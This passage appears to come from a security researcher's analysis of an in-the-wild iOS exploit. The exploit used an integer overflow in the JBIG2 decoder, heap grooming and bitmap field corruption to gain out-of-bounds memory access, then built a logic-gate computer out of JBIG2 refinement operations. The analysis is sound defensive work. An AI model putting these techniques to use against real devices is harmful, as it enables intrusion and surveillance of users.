Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

      } else if (seg->getType() == jbig2SegCodeTable) {

        codeTables->append(seg);

      }

    } else {

      error(errSyntaxError, getPos(),

            "Invalid segment reference in JBIG2 text region");

      delete codeTables;

      return;

    }

  }

...

  // get the symbol bitmaps

  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        symbolDict = (JBIG2SymbolDict *)seg;

        for (k = 0; k < symbolDict->getSize(); ++k) {

          syms[kk++] = symbolDict->getBitmap(k); // (4)

        }

      }

    }

  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

❌
❌